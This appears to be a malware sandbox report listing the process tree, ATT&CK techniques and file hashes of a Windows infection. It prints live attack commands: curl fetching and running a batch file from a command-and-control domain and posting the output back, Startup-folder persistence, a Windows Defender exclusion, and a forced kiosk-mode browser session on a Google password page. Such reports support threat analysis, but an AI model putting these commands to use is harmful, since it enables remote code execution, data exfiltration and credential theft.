PID:2900
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3888
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:464
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:1068
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:1524
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:5336
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5352
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:5604
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:6112
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3388
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:4936
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:5008
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:892
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5656
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3172
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:2428
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:948
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:3828
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\1014081001\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:5368
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:5356
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C313031343038313030315C4D3569465232302E657865" -X POST -H "X-Auth: 2F55544B4245424C4F2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe"C:\Users\Admin\AppData\Local\Temp\1014365001\W4KLQf7.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo4⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:3388
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014377001\c700dec7dc.exe"C:\Users\Admin\AppData\Local\Temp\1014377001\c700dec7dc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4256 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 5764⤵
- Program crash
PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"4⤵
- Executes dropped EXE
PID:5016
-
-
C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"C:\Users\Admin\AppData\Local\Temp\1014378001\023aa85f50.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4576
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe"C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1436 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1014379001\6ce0a63070.exe" & rd /s /q "C:\ProgramData\XBA1N7QQIMO8" & exit4⤵
- System Location Discovery: System Language Discovery
PID:1428 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4880
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 20524⤵
- Program crash
PID:4908
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014380001\ebde0dba70.exe"C:\Users\Admin\AppData\Local\Temp\1014380001\ebde0dba70.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3060 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3984
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4972 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1976 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {08f4e28b-08d7-43c0-aa51-00dfa71d73d2} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" gpu6⤵PID:1940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3eb39911-1589-474a-91ed-bfd8283d4588} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" socket6⤵PID:4904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3160 -childID 1 -isForBrowser -prefsHandle 3152 -prefMapHandle 3148 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d486d5d9-8956-4f6f-902e-7bf0f48e31fd} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab6⤵PID:1868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3796 -childID 2 -isForBrowser -prefsHandle 3788 -prefMapHandle 3784 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {838a367a-5545-4ad0-80d7-92c259be4b60} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab6⤵PID:3928
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4728 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4736 -prefMapHandle 4668 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a441670-460f-4a12-87c2-48509da7dad2} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" utility6⤵
- Checks processor information in registry
PID:5500
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5376 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47404e77-e972-4b67-a265-895c4d439edc} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab6⤵PID:3264
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 4 -isForBrowser -prefsHandle 5528 -prefMapHandle 5536 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7bb04005-dd49-433a-b2e0-cf7e3cc0a054} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab6⤵PID:4992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 5 -isForBrowser -prefsHandle 5792 -prefMapHandle 5344 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22fb39e7-8df5-4f53-b3c7-3a1cda2a0893} 4972 "\\.\pipe\gecko-crash-server-pipe.4972" tab6⤵PID:5680
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1014381001\aecc472bb8.exe"C:\Users\Admin\AppData\Local\Temp\1014381001\aecc472bb8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3176
-
-
C:\Users\Admin\AppData\Local\Temp\1014382001\aceb2f67bf.exe"C:\Users\Admin\AppData\Local\Temp\1014382001\aceb2f67bf.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\1014383001\f82296a49e.exe"C:\Users\Admin\AppData\Local\Temp\1014383001\f82296a49e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6088
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1436 -ip 14361⤵PID:1992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4256 -ip 42561⤵PID:1664
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5936
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5464
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\cache2\entries\92F4D5A4F9CED6E2E644D803AEE3647A0EA4D984
Filesize13KB
MD572e1f43eba97abd83cd742ed398f9531
SHA17b8cc736eb7ee3d36dee31db40b2d91184c751da
SHA256d08bb3fed89bd51f39dfcfb3dcb1c1c82aa072c31f47e3c4e3195096eb4a43fe
SHA512c2fa5dba3b4d3b5479e09aed4430f234679ccf5aeec61ecafb5aa69f13cc9c6ceabcb278257389c603d419c5cf70a81ce7b3ac969d44519ef3d9010cb821b1b1
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6ir3v68x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
710KB
MD528e568616a7b792cac1726deb77d9039
SHA139890a418fb391b823ed5084533e2e24dff021e1
SHA2569597798f7789adc29fbe97707b1bd8ca913c4d5861b0ad4fdd6b913af7c7a8e2
SHA51285048799e6d2756f1d6af77f34e6a1f454c48f2f43042927845931b7ecff2e5de45f864627a3d4aa061252401225bbb6c2caa8532320ccbe401e97c9c79ac8e5
-
Filesize
898KB
MD55950611ed70f90b758610609e2aee8e6
SHA1798588341c108850c79da309be33495faf2f3246
SHA2565270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
SHA5127e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80
-
Filesize
3.7MB
MD512c766cab30c7a0ef110f0199beda18b
SHA1efdc8eb63df5aae563c7153c3bd607812debeba4
SHA2567b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316
SHA51232cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10
-
Filesize
1.9MB
MD56b388916c9f72353cbd4799ed242d4f4
SHA164b382ca1909b0ae89f26d49652f19fceaf33a48
SHA25683cc25a9b6c72190cd8886758cc9afa6625be19579a7532faa97f3feb5e6a7fd
SHA51290e42d22d3c2f87daa6703312dab91c00f6026f17325434f75520852d96d31969c4ebca0f94947626c372b18b57cc7e8af11d637cda68c2526d3971d44f7e85a
-
Filesize
384KB
MD5dfd5f78a711fa92337010ecc028470b4
SHA11a389091178f2be8ce486cd860de16263f8e902e
SHA256da96f2eb74e60de791961ef3800c36a5e12202fe97ae5d2fcfc1fe404bc13c0d
SHA512a3673074919039a2dc854b0f91d1e1a69724056594e33559741f53594e0f6e61e3d99ec664d541b17f09ffdebc2de1b042eec19ca8477fac86359c703f8c9656
-
Filesize
947KB
MD582371c46d624ba7ee9047f7008ba2e3c
SHA1f9855774f6db73dce92e733a0cfb2d4fd70e5422
SHA256bd7497cac83a386d4b21f84fe94e9df74603230d46507582f7de4c6a2fe760d4
SHA512d8f8e060de3c39f28bf2269273e26d2f9101d0b05de18ffa2c535ad628775321d696aa3ee82f9a546c44e8b74bec72938a6a40faaecfcda60324f3cceb68d402
-
Filesize
1.7MB
MD5656562cca191b9d58ce38dd8b98b7879
SHA129133dce961cadbfa01da2581dc43cd6b2c2a745
SHA25661b227734b42abc0b52830af310f124bf668f033aaeec5cf5c58b001261a2ca3
SHA512e7675dad6a82442ff43347de725fb0d223fc264205951494e35144e9c9ecea77042cc5e25fbc9bc5191897a126adbb6abc88c233f88a067a01efea6a0c10ce03
-
Filesize
2.7MB
MD5a64f923cacadf2e7020d0e9b7383276c
SHA159146faef7928db615b58a1eb9757ff8b2ad0337
SHA2562f7d1a912f1c224867bffc00e2ce664df0b131abdf1128d7f50cfd373f9196f5
SHA512a8f9f8ad1bc2aa54a0092e4dcc77e020151a0137bc9b28dcc494f27c0c45fd124801b064400b813c7aee76d4337c1239a5da96bf99e9ffbbe47231b0597f5bef
-
Filesize
2.5MB
MD52a78ce9f3872f5e591d643459cabe476
SHA19ac947dfc71a868bc9c2eb2bd78dfb433067682e
SHA25621a2ac44acd7a640735870eebfd04b8dc57bc66877cb5be3b929299e86a43dae
SHA51203e2cd8161a1394ee535a2ea7d197791ab715d69a02ffab98121ec5ac8150d2b17a9a32a59307042c4bbeffad7425b55efa047651de6ed39277dba80711454f9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.1MB
MD5326a64b31756243c9d480b7d9ee2b710
SHA1c82a3fa741caf754a04adf6a900741bdbd17af75
SHA256697e1a05b676462c857c136ebc39cdd2a41e8b0e8ec5ec9a286822b562035280
SHA51242ab7d47003c972c419770e58a50566c8f92c22ccac150d222434fad537d6285f465a60fe15049cda266af22eb4999af88a758ca020e0e4f052f5fc5345d96b3
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
33B
MD5fadb1d7b567cf2a274ba3f3dea091bc1
SHA169ae77407b65dbae20e0181037e552a417dc53cf
SHA256d9e13cf7d93064b70f49b5ffebdf9e8ff496f7daa875f6a29591fe8a469cd8a1
